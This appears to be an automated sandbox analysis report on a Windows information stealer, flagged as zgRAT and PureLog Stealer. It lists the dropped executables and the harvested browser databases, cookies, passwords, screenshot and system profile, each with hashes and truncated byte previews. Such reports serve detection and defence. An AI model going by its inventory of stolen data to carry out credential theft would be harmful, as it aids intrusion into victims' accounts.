Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x...+...+...+z.....+z.....+z.....+k\....+k\....+z.....+...+(..+k\....+Z_....+Z_....+Z_....+Rich...+........PE..L...q..f...............'.@..........Rt.......P....@..........................p............@.............................P.......<............................P......h...................................@............P..d............................text............0.................. ..`.BsS.........@.......4.............. ..`.rdata..4....P.......D..............@..@.data...4I.......:..................@....reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\70WEwl36WBWTWeb Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	348160
Entropy (8bit):	6.164843423829662
Encrypted:	false
SSDEEP:	6144:PW1SR6pmLZAuSWjVBojHmrXLXxhABtHqS2/Y++Rh5qrU/PD:PW1SRKGZIYViTGXLgHqX/k0rUn
MD5:	2FCB3543D06F526E93C7276356F557B7
SHA1:	3A646514C23CD1D38E83531B9399E2360EC62578
SHA-256:	7E359CC02DE7A6050C8B81EB16278E5356BE6CA904950E820F4AFADB8BB9EA2A
SHA-512:	FFA19E94CAEB66692CF30F4DCC036369DAA4D0B5377F4E3A7330C62DD8E10C1E0C388A68D8E6EAFB31E57F70312884123433AF9D8A0DFD601F9286A073795604
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.....$.......I... ...`....@.. ....................................@..................................H..K....`... ........................................................................... ............... ..H............text...4)... ..................... ..`.rsrc.... ...`..."...,..............@..@.reloc...............N..............@..B.................I......H........Y..`x......0...<....)..............................................(......0...........s........~....%:....&~......!...s....%.....(...+o.....8[....o...............%..F~....(.....%..G~....(.....%..H~....(.....%..e~....(.....~....(.......o......8......(......s.......s>.......~....}....~...........s....(....o....}......{.....I~....(....o........9......I~....(.......8C........~....(....o....:......{....~....(....8......{....~....(.........(...........9........o........(

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	430592
Entropy (8bit):	7.502731457989579
Encrypted:	false
SSDEEP:	12288:Zh0vCnLVT7zishmwaOF9dJl3AnhpzTly:Z8kLVPzMO9dnQnhZT
MD5:	F88272EA7674D3ACEDD8ADCF7643C598
SHA1:	0066FD44E2CD9293AF414F735BD80456F4E3EB1D
SHA-256:	FAD264ACC346BE1E63CD47611CD305CB9C894A13843119E22E87744808295387
SHA-512:	3D3435572767B85307271519A5A51668E284CC9AA0D09BF024AAFF31A4B4329BB189C627CEDA90BA00F02445F0D34F4DE642B30B054ECF9D1AC88BABEB113963
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._.._.._.....N...........I...q.M...q.J.....X.._......q.....r.^...r.^...r.^..Rich_..................PE..L...V.~f...............'.j...6......g.............@.......................................@..........................)..P...@*..P...............................4...X...................................@...............d............................text...7X.......Z.................. ..`.BsS....M....p.......^.............. ..`.rdata..f............n..............@..@.data....`...@...P..."..............@....reloc..4........ ...r..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\D87fZN3R3jFeplaces.sqlite

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\DE7o6D8KRQYZWeb Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\KiPY9kwddw5OLogin Data For Account

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\LCD6mNT9opEeHistory

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\Pipe5udjKZEvWeb Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\SrAt_MHzXgCcHistory

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\_9GToUJeg5UwWeb Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\_uGW_ubMqm8ALogin Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\ehBGgoQPsbnGCookies

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\hzBvBK8Qfe_SWeb Data

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\zLzn5RU6E7dhHistory

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\trixy3qyfLZqnmIGj\Cookies\Chrome_Default.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (769), with CRLF line terminators
Category:	dropped
Size (bytes):	6085
Entropy (8bit):	6.038274200863744
Encrypted:	false
SSDEEP:	96:gxsumX/xKO2KbcRfbZJ5Jxjxcx1xcbza5BC126oxgxA26Fxr/CxbTxqCGYURxOeb:gWFXZQHRFJ5Pts7c3avC126Ygb6Lr/WY
MD5:	ACB5AD34236C58F9F7D219FB628E3B58
SHA1:	02E39404CA22F1368C46A7B8398F5F6001DB8F5C
SHA-256:	05E5013B848C2E619226F9E7A084DC7DCD1B3D68EE45108F552DB113D21B49D1
SHA-512:	5895F39765BA3CEDFD47D57203FD7E716347CD79277EDDCDC83A729A86E2E59F03F0E7B6B0D0E7C7A383755001EDACC82171052BE801E015E6BF7E6B9595767F
Malicious:	false
Preview:	.google.com.TRUE./.TRUE.1712145003.NID.ENC893_djEw3+k+F2A/rK1XOX2BXUq6pY2LBCOzoXODiJnrrvDbDsPWiYwKZowg9PxHqkTm37HpwC52rXpnuUFrQMpV3iKtdSHegOm+XguZZ6tGaCY2hGVyR8JgIqQma1WLXyhCiWqjou7/c3qSeaKyNoUKHa4TULX4ZnNNtXFoCuZcBAAy4tYcz+0BF4j/0Pg+MgV+s7367kYcjO4q3zwc+XorjSs7PlgWlYrcc55rCJplhJ+H13M00HIdLm+1t9PACck2xxSWX2DsA61sEDJCHEc=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.FALSE./.TRUE.1696413835..AspNetCore.AuthProvider.ENC893_djEwVWJCCNyFkY3ZM/58ZZ/F/bz9H1yPvi6FOaroXC+KU8E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.ENC893_djEwBAKLrkJs5PZ6BD7Beoa9N/bOSh5JtRch10gZT+E=_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=..support.microsoft.com.TRUE./signin-oidc.TRUE.1696414135..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkH

C:\Users\user\AppData\Local\Temp\trixy3qyfLZqnmIGj\History\Firefox_fqs92o4p.default-release.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	112
Entropy (8bit):	4.911305722693245
Encrypted:	false
SSDEEP:	3:N8DSLvIJiMgTE2WdkQUl7R8DSLvIJiMhKVX3L2WdkQUlv:2OLciodq7R8OLciA8dqv
MD5:	978B9515D3688A43726604AC169DF379
SHA1:	D61293AB99332FC45CAE37D78AB17A5DA5BCD189
SHA-256:	CDEF3FB1CE312E4B67DC5F1B1F9FB551241C08564FDB26AFA4CBF448BB02EA65
SHA-512:	86146AA576129B73743B1EBC0BC60880FDA58A11498048B3C68284C4520F1ADC324D016696B0E995A51AC56966E0F38B0AF12458A986868701C6AAAA89C829CB
Malicious:	false
Preview:	https://www.mozilla.org/privacy/firefox/.1696333827..https://www.mozilla.org/en-US/privacy/firefox/.1696333827..

C:\Users\user\AppData\Local\Temp\trixy3qyfLZqnmIGj\information.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	7093
Entropy (8bit):	5.513400694017126
Encrypted:	false
SSDEEP:	96:xz8MJARR26cT4Aisph+9hcmfPh4e841jelDANUbg3x:xCs6vAtphWhcmfPh4eplB
MD5:	CADF9DF7A84AA8223C584BC77B9D2BB2
SHA1:	E4BC39C923883CB6A61A89B2795C0EDE91F2724F
SHA-256:	5D6B5875C035DE662B1DF8AF10CB88083A1283C679CA20F09AA96F4CF14022DD
SHA-512:	7A3F738CF4315E298115F686977FCAB4D1E4F1ADABBE2F6601B3BD3438EF6CDA2FB612425719D19BA1B9C33CE1F3E778BD7AFCFAD146C5359CADF9A4472CC193
Malicious:	false
Preview:	Build: default..Version: 2.0....Date: Mon Jul 1 03:16:10 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: a015f45f7c173968144e8d814d1b47ae....Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixy3qyfLZqnmIGj....IP: 8.46.123.33..Location: US, New York..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 813848 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 1/7/2024 3:16:10..TimeZone: UTC-5....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [324]..csrss.exe [408]..wininit.exe [484]..csrss.exe [492]..winlogon.exe [552]..services.exe [620]..lsass.exe [628]..svchost.exe [752]..fontdrvhost.exe [776]..

C:\Users\user\AppData\Local\Temp\trixy3qyfLZqnmIGj\passwords.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	Unicode text, UTF-8 text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	4897
Entropy (8bit):	2.518316437186352
Encrypted:	false
SSDEEP:	48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
MD5:	B3E9D0E1B8207AA74CB8812BAAF52EAE
SHA1:	A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
SHA-256:	4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
SHA-512:	B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\trixy3qyfLZqnmIGj\screenshot.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	709390
Entropy (8bit):	7.926641460801848
Encrypted:	false
SSDEEP:	12288:9Zl1CbYKs9T7tva50jvNVqzE2cpTzufAo1g2DIc03UnxGNq5SjEYmsgqHcMgz07j:9ZlcbGtvnTNVqzzcpTy1gmIInxMOdq82
MD5:	DD13D1A750663C0C21420EC78B14CC34
SHA1:	7080C718135DF045039EFDE2C2BB2BFC891DC82F
SHA-256:	028D9101C795A79BC1492094CB99F2FB93BF0BD4EB642F5B4A02DC004AFE30B3
SHA-512:	F3567D0ACEC262022FEDE14B481458CDE0151B676B25B256FC37C78DE4F6EC520C87C1E89347E0AB3047FD2702B54B386DDDE2941E4A7E7292C7C6691B00EED2
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e....Y.......Lw..#.t......y.o.n..%....w.U....@B......@.A.e.P.....r..Fx.. .}...;.u.7.@V..{.....E....i.N.9.....B.ln.....V...i3C.T..Y.L...:.~.p..(...+h.}.....3v.....K..=....(...>az.......jL.+...{z..Z..@..+..I....cGO..QO.e....O6}..5......N..7.M....M../=:....Hi....+h..i.:......Jc..p...=....[?...l.)0.....>}.....h...1....../z2^0...W\|.....c...i......?.9....v..?....1c..'3.........9..Y...X.r..}.j...?.w..}...a\|.;'..=.e....nKs..g...I.........+.}@.s..Z.`...=nM.=.=nI...-.5c6?.{.=,n.....a.yh.zsF..nib...#......4....b.......96o....]-g....R...7...nL..oH....}..v.{...\|....X.\|k...<.y.Y...y..........]...8...4wG.....6..u....6..KoI.w.}..si..`.}..6...&.....lwMfl.S{.......Z...2......._KK....Y....5..X.9...[.[_.a..u....yC..%Wd......]....L.Gll..]..il.+r..v....f.7.~.>.]b..>h/..._bk.....Z..lny.^..7..Z....q..[.wn1.O...%...e9...9.\].k1..i..6....,F;

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.474097070044504
Encrypted:	false
SSDEEP:	6144:bIXfpi67eLPU9skLmb0b4dWSPKaJG8nAgejZMMhA2gX4WABl0uNLdwBCswSbs:8XD94dWlLZMM6YFHV+s
MD5:	3265BDDCB7FA49D38F8C19B9807E0ECD
SHA1:	B8390D1B87B69AD2BD61EBD068A047D5F9A0D39F
SHA-256:	5BF405E59760DE4416AE79E10EC347D0A1D3EDFAE01E7CBCADFA97556D0998A1
SHA-512:	E6B3DF0BAC649D354A19CD445D1F325EBBDA53FD42B4A284FD8BC54BE1855A837E06B727988AC37089A898D58AA03B006AA1A86BB3FC1D836C05BED6B700AF6A
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmNX..................................................................................................................................................................................................................................................................................................................................................n...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.954001690712007
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	zyJWi2vy29.exe
File size:	1'854'464 bytes
MD5:	97768ab0a4837757b74de2ae892badab
SHA1:	d8bdfdb717b64ee4cd7a892bbddd293f7eaf915c
SHA256:	0f88ea51a56da966d12311a4b20ea3a6c44315e00747a589f19cf535f90ced77
SHA512:	78bc5c866b12fcc82cdda20622694824b227a4d522632ffca4b6608bb5245a5e39c28e7f10dfd9e253407a922dae47a83171fb3f605597af4f7186c3aaf5dcde
SSDEEP:	49152:Ktx9fJc02euDyRs7NNvZpFW3wrqirfHWZjlavwpX:Ktx9fe02beG5Nv+w+irHWZjlavwpX
TLSH:	D085232174D58072E423103609F5DB74CABDBAB44B512ECFA7E48FBE4B312C2AB75256
